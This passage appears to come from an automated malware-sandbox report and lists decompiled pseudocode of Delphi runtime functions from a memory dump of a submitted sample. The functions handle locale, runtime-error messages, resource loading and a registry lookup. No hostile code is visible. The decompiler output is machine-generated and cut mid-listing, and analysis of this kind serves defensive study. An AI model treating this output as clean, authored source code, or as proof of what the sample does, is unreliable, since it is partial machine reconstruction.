      • Part of subcall function 0040B3A0: GetSystemMetrics.USER32(0000002A), ref: 0040B4D0
      • Part of subcall function 00409E60: GetThreadLocale.KERNEL32(00000000,00409F73,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409E7C
    • GetThreadLocale.KERNEL32(00000000,0040B7DF,?,?,00000000,00000000), ref: 0040B54A
      • Part of subcall function 00409DB0: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 00409DCE
      • Part of subcall function 00409DFC: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040B5C6,00000000,0040B7DF,?,?,00000000,00000000), ref: 00409E0F
      • Part of subcall function 0040A0E8: GetThreadLocale.KERNEL32(?,00000000,0040A2B2,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A117
      • Part of subcall function 0040A038: GetThreadLocale.KERNEL32(?,00000000,0040A0CF,?,?,00000000), ref: 0040A050
      • Part of subcall function 0040A038: GetThreadLocale.KERNEL32(00000000,00000004,00000000,0040A0CF,?,?,00000000), ref: 0040A080
      • Part of subcall function 0040A038: EnumCalendarInfoA.KERNEL32(Function_00009F84,00000000,00000000,00000004), ref: 0040A08B
      • Part of subcall function 0040A038: GetThreadLocale.KERNEL32(00000000,00000003,00000000,0040A0CF,?,?,00000000), ref: 0040A0A9
      • Part of subcall function 0040A038: EnumCalendarInfoA.KERNEL32(Function_00009FC0,00000000,00000000,00000003), ref: 0040A0B4
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.1501156262.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_obtG43AWHP.jbxd
    Function 0040DBC0, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 139
    C-Code - Quality: 77%
    			E0040DBC0(short* __eax, intOrPtr __ecx, intOrPtr* __edx) {
				char _v260;
				char _v768;
				char _v772;
				short* _v776;
				intOrPtr _v780;
				char _v784;
				signed int _v788;
				signed short* _v792;
				char _v796;
				char _v800;
				intOrPtr* _v804;
				void* __ebp;
				signed char _t47;
				signed int _t54;
				void* _t62;
				intOrPtr* _t73;
				intOrPtr* _t91;
				void* _t93;
				void* _t95;
				void* _t98;
				void* _t99;
				intOrPtr* _t108;
				void* _t112;
				intOrPtr _t113;
				char* _t114;
				void* _t115;

				_t100 = __ecx;
				_v780 = __ecx;
				_t91 = __edx;
				_v776 = __eax;
				if(( *(__edx + 1) & 0x00000020) == 0) {
					E0040D7EC(0x80070057);
				}
				_t47 =  *_t91;
				if((_t47 & 0x00000fff) != 0xc) {
					_push(_t91);
					_push(_v776);
					L0040C5A0();
					return E0040D7EC(_v776);
				} else {
					if((_t47 & 0x00000040) == 0) {
						_v792 =  *((intOrPtr*)(_t91 + 8));
					} else {
						_v792 =  *((intOrPtr*)( *((intOrPtr*)(_t91 + 8))));
					}
					_v788 =  *_v792 & 0x0000ffff;
					_t93 = _v788 - 1;
					if(_t93 < 0) {
						L9:
						_push( &_v772);
						_t54 = _v788;
						_push(_t54);
						_push(0xc);
						L0040C9F4();
						_t113 = _t54;
						if(_t113 == 0) {
							E0040D544(_t100);
						}
						E0040DB18(_v776);
						 *_v776 = 0x200c;
						 *((intOrPtr*)(_v776 + 8)) = _t113;
						_t95 = _v788 - 1;
						if(_t95 < 0) {
							L14:
							_t97 = _v788 - 1;
							if(E0040DB34(_v788 - 1, _t115) != 0) {
								L0040CA0C();
								E0040D7EC(_v792);
								L0040CA0C();
								E0040D7EC( &_v260);
								_v780(_t113,  &_v260,  &_v800, _v792,  &_v260,  &_v796);
							}
							_t62 = E0040DB64(_t97, _t115);
						} else {
							_t98 = _t95 + 1;
							_t73 =  &_v768;
							_t108 =  &_v260;
							do {
								 *_t108 =  *_t73;
								_t108 = _t108 + 4;
								_t73 = _t73 + 8;
								_t98 = _t98 - 1;
							} while (_t98 != 0);
							do {
								goto L14;
							} while (_t62 != 0);
							return _t62;
						}
					} else {
						_t99 = _t93 + 1;
						_t112 = 0;
						_t114 =  &_v772;
						do {
							_v804 = _t114;
							_push(_v804 + 4);
							_t18 = _t112 + 1; // 0x1
							_push(_v792);
							L0040C9FC();
							E0040D7EC(_v792);
							_push( &_v784);
							_t21 = _t112 + 1; // 0x1
							_push(_v792);
							L0040CA04();
							E0040D7EC(_v792);
							 *_v804 = _v784 -  *((intOrPtr*)(_v804 + 4)) + 1;
							_t112 = _t112 + 1;
							_t114 = _t114 + 8;
							_t99 = _t99 - 1;
						} while (_t99 != 0);
						goto L9;
					}
				}
			}





























    0x0040dbc0
    0x0040dbcc
    0x0040dbd2
    0x0040dbd4
    0x0040dbde
    0x0040dbe5
    0x0040dbe5
    0x0040dbea
    0x0040dbf8
    0x0040dd71
    0x0040dd78
    0x0040dd79
    0x00000000
    0x0040dbfe
    0x0040dc01
    0x0040dc13
    0x0040dc03
    0x0040dc08
    0x0040dc08
    0x0040dc22
    0x0040dc2e
    0x0040dc31
    0x0040dc9e
    0x0040dca4
    0x0040dca5
    0x0040dcab
    0x0040dcac
    0x0040dcae
    0x0040dcb3
    0x0040dcb7
    0x0040dcb9
    0x0040dcb9
    0x0040dcc4
    0x0040dccf
    0x0040dcda
    0x0040dce3
    0x0040dce6
    0x0040dd02
    0x0040dd09
    0x0040dd14
    0x0040dd2b
    0x0040dd30
    0x0040dd44
    0x0040dd49
    0x0040dd5c
    0x0040dd5c
    0x0040dd65
    0x0040dce8
    0x0040dce8
    0x0040dce9
    0x0040dcef
    0x0040dcf5
    0x0040dcf7
    0x0040dcf9
    0x0040dcfc
    0x0040dcff
    0x0040dcff
    0x0040dd02
    0x00000000
    0x00000000
    0x00000000
    0x0040dd02
    0x0040dc33
    0x0040dc33
    0x0040dc34
    0x0040dc36
    0x0040dc3c
    0x0040dc3e
    0x0040dc4d
    0x0040dc4e
    0x0040dc58
    0x0040dc59
    0x0040dc5e
    0x0040dc69
    0x0040dc6a
    0x0040dc74
    0x0040dc75
    0x0040dc7a
    0x0040dc95
    0x0040dc97
    0x0040dc98
    0x0040dc9b
    0x0040dc9b
    0x00000000
    0x0040dc3c
    0x0040dc31

    APIs
    • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0040DC59
    • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0040DC75
    • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 0040DCAE
    • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0040DD2B
    • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 0040DD44
    • VariantCopy.OLEAUT32(?), ref: 0040DD79
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.1501156262.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_obtG43AWHP.jbxd
    Function 00403C90, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38
    C-Code - Quality: 79%
    			E00403C90(void* __ecx) {
				long _v4;
				int _t3;

				if( *0x454044 == 0) {
					if( *0x419030 == 0) {
						_t3 = MessageBoxA(0, "Runtime error     at 00000000", "Error", 0);
					}
					return _t3;
				} else {
					if( *0x454218 == 0xd7b2 &&  *0x454220 > 0) {
						 *0x454230();
					}
					WriteFile(GetStdHandle(0xfffffff5), "Runtime error     at 00000000", 0x1e,  &_v4, 0);
					return WriteFile(GetStdHandle(0xfffffff5), E00403D18, 2,  &_v4, 0);
				}
			}





    0x00403c98
    0x00403cf8
    0x00403d08
    0x00403d08
    0x00403d0e
    0x00403c9a
    0x00403ca3
    0x00403cb3
    0x00403cb3
    0x00403ccf
    0x00403cf0
    0x00403cf0

    APIs
    • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000), ref: 00403CC9
    • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?), ref: 00403CCF
    • GetStdHandle.KERNEL32(000000F5,00403D18,00000002,?,00000000,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000), ref: 00403CE4
    • WriteFile.KERNEL32(00000000,000000F5,00403D18,00000002,?), ref: 00403CEA
    • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D08
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.1501156262.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_obtG43AWHP.jbxd
    Function 0040B9A0, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 41
    C-Code - Quality: 100%
    			E0040B9A0() {
				struct HINSTANCE__** _t2;
				void* _t3;
				struct HINSTANCE__** _t5;
				struct HRSRC__* _t7;
				struct HINSTANCE__** _t8;
				intOrPtr* _t11;
				intOrPtr* _t12;
				struct HINSTANCE__* _t13;

				_t2 =  *0x452f9c; // 0x45402c
				if( *_t2 != 0) {
					_t5 =  *0x452f9c; // 0x45402c
					_t7 = FindResourceA( *_t5, "DVCLAL", 0xa);
					_t8 =  *0x452f9c; // 0x45402c
					return LoadResource( *_t8, _t7);
				}
				_t3 = 0;
				_t11 =  *0x4530b8; // 0x419034
				_t12 =  *_t11;
				if(_t12 != 0) {
					while(1) {
						_t13 =  *(_t12 + 4);
						_t3 = LoadResource(_t13, FindResourceA(_t13, "DVCLAL", 0xa));
						if(_t3 != 0) {
							goto L5;
						}
						_t12 =  *_t12;
						if(_t12 != 0) {
							continue;
						}
						goto L5;
					}
				}
				L5:
				return _t3;
			}











    0x0040b9a3
    0x0040b9ab
    0x0040b9b4
    0x0040b9bc
    0x0040b9c2
    0x00000000
    0x0040b9ca
    0x0040b9d1
    0x0040b9d3
    0x0040b9d9
    0x0040b9dd
    0x0040b9df
    0x0040b9e8
    0x0040b9f3
    0x0040b9fa
    0x00000000
    0x00000000
    0x0040b9fc
    0x0040ba00
    0x00000000
    0x00000000
    0x00000000
    0x0040ba00
    0x0040b9df
    0x0040ba05
    0x0040ba05

    APIs
    • FindResourceA.KERNEL32(00400000,DVCLAL,0000000A), ref: 0040B9BC
    • LoadResource.KERNEL32(00400000,00000000,00400000,DVCLAL,0000000A,?,00416F00,00000000,0040BA1A,?,?,?,00416F00,00000000,0040BA89,004171A3), ref: 0040B9CA
    • FindResourceA.KERNEL32(?,DVCLAL,0000000A), ref: 0040B9EC
    • LoadResource.KERNEL32(?,00000000,?,00416F00,00000000,0040BA1A,?,?,?,00416F00,00000000,0040BA89,004171A3,00416F00,00000000,00417553), ref: 0040B9F3
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.1501156262.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_obtG43AWHP.jbxd
    Function 00405945, Relevance: 9.0, APIs: 6, Instructions: 41
    C-Code - Quality: 100%
    			E00405945(void* __eax, void* __ebx, void* __ecx, intOrPtr* __edi) {
				long _t11;
				void* _t16;

				_t16 = __ebx;
				 *__edi =  *__edi + __ecx;
				 *((intOrPtr*)(__eax - 0x4545b4)) =  *((intOrPtr*)(__eax - 0x4545b4)) + __eax - 0x4545b4;
				 *0x419008 = 2;
				 *0x454014 = 0x4011a8;
				 *0x454018 = 0x4011b0;
				 *0x454046 = 2;
				 *0x454000 = E00404B04;
				if(E00402F5C() != 0) {
					_t3 = E00402F8C();
				}
				E00403050(_t3);
				 *0x45404c = 0xd7b0;
				 *0x454218 = 0xd7b0;
				 *0x4543e4 = 0xd7b0;
				 *0x45403c = GetCommandLineA();
				 *0x454038 = E004012C0();
				if((GetVersion() & 0x80000000) == 0x80000000) {
					 *0x4545b8 = E0040587C(GetThreadLocale(), _t16, __eflags);
				} else {
					if((GetVersion() & 0x000000ff) <= 4) {
						 *0x4545b8 = E0040587C(GetThreadLocale(), _t16, __eflags);
					} else {
						 *0x4545b8 = 3;
					}
				}
				_t11 = GetCurrentThreadId();
				 *0x454030 = _t11;
				return _t11;
			}





    0x00405945
    0x0040594a
    0x0040594f
    0x00405951
    0x00405958
    0x00405962
    0x0040596c
    0x00405973
    0x00405984
    0x00405986
    0x00405986
    0x0040598b
    0x00405990
    0x00405999
    0x004059a2
    0x004059b0
    0x004059ba
    0x004059ce
    0x00405a07
    0x004059d0
    0x004059de
    0x004059f6
    0x004059e0
    0x004059e0
    0x004059e0
    0x004059de
    0x00405a0c
    0x00405a11
    0x00405a16

    APIs
      • Part of subcall function 00402F5C: GetKeyboardType.USER32(00000000), ref: 00402F61
      • Part of subcall function 00402F5C: GetKeyboardType.USER32(00000001), ref: 00402F6D
    • GetCommandLineA.KERNEL32 ref: 004059AB
      • Part of subcall function 004012C0: GetStartupInfoA.KERNEL32 ref: 004012CA
    • GetVersion.KERNEL32 ref: 004059BF
    • GetVersion.KERNEL32 ref: 004059D0
    • GetThreadLocale.KERNEL32 ref: 004059EC
    • GetThreadLocale.KERNEL32 ref: 004059FD
      • Part of subcall function 0040587C: GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,004058E2), ref: 004058A2
    • GetCurrentThreadId.KERNEL32 ref: 00405A0C
      • Part of subcall function 00402F8C: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FAE
      • Part of subcall function 00402F8C: RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00402FFD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FE1
      • Part of subcall function 00402F8C: RegCloseKey.ADVAPI32(?,00403004,00000000,?,00000004,00000000,00402FFD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FF7
    Memory Dump Source
    • Source File: 0000000A.00000002.1501156262.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_obtG43AWHP.jbxd
    Function 0040A980, Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 107
    C-Code - Quality: 86%
    			E0040A980(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
				char _v8;
				struct _MEMORY_BASIC_INFORMATION _v36;
				char _v297;
				char _v304;
				intOrPtr _v308;
				char _v312;
				char _v316;
				char _v320;
				intOrPtr _v324;
				char _v328;
				void* _v332;
				char _v336;
				char _v340;
				char _v344;
				char _v348;
				intOrPtr _v352;
				char _v356;
				char _v360;
				char _v364;
				void* _v368;
				char _v372;
				intOrPtr _t52;
				intOrPtr _t60;
				intOrPtr _t82;
				intOrPtr _t86;
				intOrPtr _t89;
				intOrPtr _t101;
				void* _t108;
				intOrPtr _t110;
				void* _t113;

				_t108 = __edi;
				_v372 = 0;
				_v336 = 0;
				_v344 = 0;
				_v340 = 0;
				_v8 = 0;
				_push(_t113);
				_push(0x40ab3b);
				_push( *[fs:eax]);
				 *[fs:eax] = _t113 + 0xfffffe90;
				_t89 =  *((intOrPtr*)(_a4 - 4));
				if( *((intOrPtr*)(_t89 + 0x14)) != 0) {
					_t52 =  *0x453064; // 0x405f58
					E00405824(_t52,  &_v8);
				} else {
					_t86 =  *0x453120; // 0x405f50
					E00405824(_t86,  &_v8);
				}
				_t110 =  *((intOrPtr*)(_t89 + 0x18));
				VirtualQuery( *(_t89 + 0xc),  &_v36, 0x1c);
				if(_v36.State != 0x1000 || GetModuleFileNameA(_v36.AllocationBase,  &_v297, 0x105) == 0) {
					_v368 =  *(_t89 + 0xc);
					_v364 = 5;
					_v360 = _v8;
					_v356 = 0xb;
					_v352 = _t110;
					_v348 = 5;
					_t60 =  *0x453068; // 0x405f00
					E00405824(_t60,  &_v372);
					E0040A5A8(_t89, _v372, 1, _t108, _t110, 2,  &_v368);
				} else {
					_v332 =  *(_t89 + 0xc);
					_v328 = 5;
					E004040F8( &_v340, 0x105,  &_v297);
					E00407660(_v340,  &_v336);
					_v324 = _v336;
					_v320 = 0xb;
					_v316 = _v8;
					_v312 = 0xb;
					_v308 = _t110;
					_v304 = 5;
					_t82 =  *0x4530a0; // 0x405ff8
					E00405824(_t82,  &_v344);
					E0040A5A8(_t89, _v344, 1, _t108, _t110, 3,  &_v332);
				}
				_pop(_t101);
				 *[fs:eax] = _t101;
				_push(E0040AB42);
				E00403E88( &_v372);
				E00403EAC( &_v344, 3);
				return E00403E88( &_v8);
			}

































    0x0040a980
    0x0040a98d
    0x0040a993
    0x0040a999
    0x0040a99f
    0x0040a9a5
    0x0040a9aa
    0x0040a9ab
    0x0040a9b0
    0x0040a9b3
    0x0040a9b9
    0x0040a9c0
    0x0040a9d4
    0x0040a9d9
    0x0040a9c2
    0x0040a9c5
    0x0040a9ca
    0x0040a9ca
    0x0040a9de
    0x0040a9eb
    0x0040a9f7
    0x0040aab3
    0x0040aab9
    0x0040aac3
    0x0040aac9
    0x0040aad0
    0x0040aad6
    0x0040aaec
    0x0040aaf1
    0x0040ab03
    0x0040aa1a
    0x0040aa1d
    0x0040aa23
    0x0040aa3b
    0x0040aa4c
    0x0040aa57
    0x0040aa5d
    0x0040aa67
    0x0040aa6d
    0x0040aa74
    0x0040aa7a
    0x0040aa90
    0x0040aa95
    0x0040aaa7
    0x0040aaac
    0x0040ab0c
    0x0040ab0f
    0x0040ab12
    0x0040ab1d
    0x0040ab2d
    0x0040ab3a

    APIs
      • Part of subcall function 00405824: LoadStringA.USER32(00000000,00010000,?,00000400), ref: 00405855
    • VirtualQuery.KERNEL32(?,?,0000001C,00000000,0040AB3B), ref: 0040A9EB
    • GetModuleFileNameA.KERNEL32(?,?,00000105,?,?,0000001C,00000000,0040AB3B), ref: 0040AA0D
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.1501156262.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_obtG43AWHP.jbxd
    Function 0040A31C, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 102
    C-Code - Quality: 100%
    			E0040A31C(intOrPtr* __eax, intOrPtr __ecx, void* __edx, void* __fp0, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v273;
				char _v534;
				char _v790;
				struct _MEMORY_BASIC_INFORMATION _v820;
				char _v824;
				intOrPtr _v828;
				char _v832;
				intOrPtr _v836;
				char _v840;
				intOrPtr _v844;
				char _v848;
				char* _v852;
				char _v856;
				char _v860;
				char _v1116;
				void* __edi;
				struct HINSTANCE__* _t40;
				intOrPtr _t51;
				struct HINSTANCE__* _t53;
				void* _t69;
				void* _t73;
				intOrPtr _t74;
				intOrPtr _t83;
				intOrPtr _t86;
				intOrPtr* _t87;
				void* _t93;

				_t93 = __fp0;
				_v8 = __ecx;
				_t73 = __edx;
				_t87 = __eax;
				VirtualQuery(__edx,  &_v820, 0x1c);
				if(_v820.State != 0x1000 || GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105) == 0) {
					_t40 =  *0x454660; // 0x400000
					GetModuleFileNameA(_t40,  &_v534, 0x105);
					_v12 = E0040A310(_t73);
				} else {
					_v12 = _t73 - _v820.AllocationBase;
				}
				E0040778C( &_v273, 0x104, E0040B24C(0x5c) + 1);
				_t74 = 0x40a49c;
				_t86 = 0x40a49c;
				_t83 =  *0x406188; // 0x4061d4
				if(E004032A0(_t87, _t83) != 0) {
					_t74 = E00404348( *((intOrPtr*)(_t87 + 4)));
					_t69 = E00407764(_t74, 0x40a49c);
					if(_t69 != 0 &&  *((char*)(_t74 + _t69 - 1)) != 0x2e) {
						_t86 = 0x40a4a0;
					}
				}
				_t51 =  *0x453108; // 0x405f28
				_t16 = _t51 + 4; // 0xffe8
				_t53 =  *0x454660; // 0x400000
				LoadStringA(E00404DCC(_t53),  *_t16,  &_v790, 0x100);
				E00403064( *_t87,  &_v1116);
				_v860 =  &_v1116;
				_v856 = 4;
				_v852 =  &_v273;
				_v848 = 6;
				_v844 = _v12;
				_v840 = 5;
				_v836 = _t74;
				_v832 = 6;
				_v828 = _t86;
				_v824 = 6;
				E00407CAC(_v8,  &_v790, _a4, _t93, 4,  &_v860);
				return E00407764(_v8, _t86);
			}































    0x0040a31c
    0x0040a328
    0x0040a32b
    0x0040a32d
    0x0040a339
    0x0040a348
    0x0040a372
    0x0040a378
    0x0040a384
    0x0040a389
    0x0040a38f
    0x0040a38f
    0x0040a3ad
    0x0040a3b2
    0x0040a3b7
    0x0040a3be
    0x0040a3cb
    0x0040a3d5
    0x0040a3d9
    0x0040a3e0
    0x0040a3e9
    0x0040a3e9
    0x0040a3e0
    0x0040a3fa
    0x0040a3ff
    0x0040a403
    0x0040a40e
    0x0040a41b
    0x0040a426
    0x0040a42c
    0x0040a439
    0x0040a43f
    0x0040a449
    0x0040a44f
    0x0040a456
    0x0040a45c
    0x0040a463
    0x0040a469
    0x0040a485
    0x0040a498

    APIs
    • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040A339
    • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040A35D
    • GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040A378
    • LoadStringA.USER32(00000000,0000FFE8,?,00000100), ref: 0040A40E
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.1501156262.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_obtG43AWHP.jbxd
    Function 0040A31A, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101
    C-Code - Quality: 100%
    			E0040A31A(intOrPtr* __eax, intOrPtr __ecx, void* __edx, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v273;
				char _v534;
				char _v790;
				struct _MEMORY_BASIC_INFORMATION _v820;
				char _v824;
				intOrPtr _v828;
				char _v832;
				intOrPtr _v836;
				char _v840;
				intOrPtr _v844;
				char _v848;
				char* _v852;
				char _v856;
				char _v860;
				char _v1116;
				void* __edi;
				struct HINSTANCE__* _t40;
				intOrPtr _t51;
				struct HINSTANCE__* _t53;
				void* _t69;
				void* _t74;
				intOrPtr _t75;
				intOrPtr _t85;
				intOrPtr _t89;
				intOrPtr* _t92;
				void* _t105;

				_v8 = __ecx;
				_t74 = __edx;
				_t92 = __eax;
				VirtualQuery(__edx,  &_v820, 0x1c);
				if(_v820.State != 0x1000 || GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105) == 0) {
					_t40 =  *0x454660; // 0x400000
					GetModuleFileNameA(_t40,  &_v534, 0x105);
					_v12 = E0040A310(_t74);
				} else {
					_v12 = _t74 - _v820.AllocationBase;
				}
				E0040778C( &_v273, 0x104, E0040B24C(0x5c) + 1);
				_t75 = 0x40a49c;
				_t89 = 0x40a49c;
				_t85 =  *0x406188; // 0x4061d4
				if(E004032A0(_t92, _t85) != 0) {
					_t75 = E00404348( *((intOrPtr*)(_t92 + 4)));
					_t69 = E00407764(_t75, 0x40a49c);
					if(_t69 != 0 &&  *((char*)(_t75 + _t69 - 1)) != 0x2e) {
						_t89 = 0x40a4a0;
					}
				}
				_t51 =  *0x453108; // 0x405f28
				_t16 = _t51 + 4; // 0xffe8
				_t53 =  *0x454660; // 0x400000
				LoadStringA(E00404DCC(_t53),  *_t16,  &_v790, 0x100);
				E00403064( *_t92,  &_v1116);
				_v860 =  &_v1116;
				_v856 = 4;
				_v852 =  &_v273;
				_v848 = 6;
				_v844 = _v12;
				_v840 = 5;
				_v836 = _t75;
				_v832 = 6;
				_v828 = _t89;
				_v824 = 6;
				E00407CAC(_v8,  &_v790, _a4, _t105, 4,  &_v860);
				return E00407764(_v8, _t89);
			}































    0x0040a328
    0x0040a32b
    0x0040a32d
    0x0040a339
    0x0040a348
    0x0040a372
    0x0040a378
    0x0040a384
    0x0040a389
    0x0040a38f
    0x0040a38f
    0x0040a3ad
    0x0040a3b2
    0x0040a3b7
    0x0040a3be
    0x0040a3cb
    0x0040a3d5
    0x0040a3d9
    0x0040a3e0
    0x0040a3e9
    0x0040a3e9
    0x0040a3e0
    0x0040a3fa
    0x0040a3ff
    0x0040a403
    0x0040a40e
    0x0040a41b
    0x0040a426
    0x0040a42c
    0x0040a439
    0x0040a43f
    0x0040a449
    0x0040a44f
    0x0040a456
    0x0040a45c
    0x0040a463
    0x0040a469
    0x0040a485
    0x0040a498

    APIs
    • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040A339
    • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040A35D
    • GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040A378
    • LoadStringA.USER32(00000000,0000FFE8,?,00000100), ref: 0040A40E
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.1501156262.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_obtG43AWHP.jbxd
    Function 00402F8C, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49
    C-Code - Quality: 65%
    			E00402F8C() {
				void* _v8;
				char _v12;
				int _v16;
				signed short _t12;
				signed short _t14;
				intOrPtr _t27;
				void* _t29;
				void* _t31;
				intOrPtr _t32;

				_t29 = _t31;
				_t32 = _t31 + 0xfffffff4;
				_v12 =  *0x419020 & 0x0000ffff;
				if(RegOpenKeyExA(0x80000002, "SOFTWARE\\Borland\\Delphi\\RTL", 0, 1,  &_v8) != 0) {
					_t12 =  *0x419020; // 0x1332
					_t14 = _t12 & 0x0000ffc0 | _v12 & 0x0000003f;
					 *0x419020 = _t14;
					return _t14;
				} else {
					_push(_t29);
					_push(E00402FFD);
					_push( *[fs:eax]);
					 *[fs:eax] = _t32;
					_v16 = 4;
					RegQueryValueExA(_v8, "FPUMaskValue", 0, 0,  &_v12,  &_v16);
					_pop(_t27);
					 *[fs:eax] = _t27;
					_push(0x403004);
					return RegCloseKey(_v8);
				}
			}












    0x00402f8d
    0x00402f8f
    0x00402f99
    0x00402fb5
    0x00403004
    0x00403016
    0x00403019
    0x00403022
    0x00402fb7
    0x00402fb9
    0x00402fba
    0x00402fbf
    0x00402fc2
    0x00402fc5
    0x00402fe1
    0x00402fe8
    0x00402feb
    0x00402fee
    0x00402ffc
    0x00402ffc

    APIs
    • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FAE
    • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00402FFD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FE1
    • RegCloseKey.ADVAPI32(?,00403004,00000000,?,00000004,00000000,00402FFD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FF7
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.1501156262.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_obtG43AWHP.jbxd
    Function 0040A038, Relevance: 7.6, APIs: 5, Instructions: 50
    C-Code - Quality: 64%
    			E0040A038(void* __esi, void* __eflags) {
				char _v8;
				intOrPtr* _t18;
				intOrPtr _t26;
				void* _t27;
				long _t29;
				intOrPtr _t32;
				void* _t33;

				_t33 = __eflags;
				_push(0);
				_push(_t32);
				_push(0x40a0cf);
				_push( *[fs:eax]);
				 *[fs:eax] = _t32;
				E00409DB0(GetThreadLocale(), 0x40a0e4, 0x100b,  &_v8);
				_t29 = E00407174(0x40a0e4, 1, _t33);
				if(_t29 + 0xfffffffd - 3 < 0) {
					EnumCalendarInfoA(E00409F84, GetThreadLocale(), _t29, 4);
					_t27 = 7;
					_t18 = 0x454764;
					do {
						 *_t18 = 0xffffffff;
						_t18 = _t18 + 4;
						_t27 = _t27 - 1;
					} while (_t27 != 0);
					EnumCalendarInfoA(E00409FC0, GetThreadLocale(), _t29, 3);
				}
				_pop(_t26);
				 *[fs:eax] = _t26;
				_push(E0040A0D6);
				return E00403E88( &_v8);
			}










    0x0040a038
    0x0040a03b
    0x0040a040
    0x0040a041
    0x0040a046
    0x0040a049
    0x0040a05f
    0x0040a071
    0x0040a07b
    0x0040a08b
    0x0040a090
    0x0040a095
    0x0040a09a
    0x0040a09a
    0x0040a0a0
    0x0040a0a3
    0x0040a0a3
    0x0040a0b4
    0x0040a0b4
    0x0040a0bb
    0x0040a0be
    0x0040a0c1
    0x0040a0ce

    APIs
    • GetThreadLocale.KERNEL32(?,00000000,0040A0CF,?,?,00000000), ref: 0040A050
      • Part of subcall function 00409DB0: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 00409DCE
    • GetThreadLocale.KERNEL32(00000000,00000004,00000000,0040A0CF,?,?,00000000), ref: 0040A080
    • EnumCalendarInfoA.KERNEL32(Function_00009F84,00000000,00000000,00000004), ref: 0040A08B
    • GetThreadLocale.KERNEL32(00000000,00000003,00000000,0040A0CF,?,?,00000000), ref: 0040A0A9
    • EnumCalendarInfoA.KERNEL32(Function_00009FC0,00000000,00000000,00000003), ref: 0040A0B4
    Memory Dump Source
    • Source File: 0000000A.00000002.1501156262.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_obtG43AWHP.jbxd
    Function 0040A0E8, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148
    C-Code - Quality: 82%
    			E0040A0E8(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				void* _t41;
				signed int _t45;
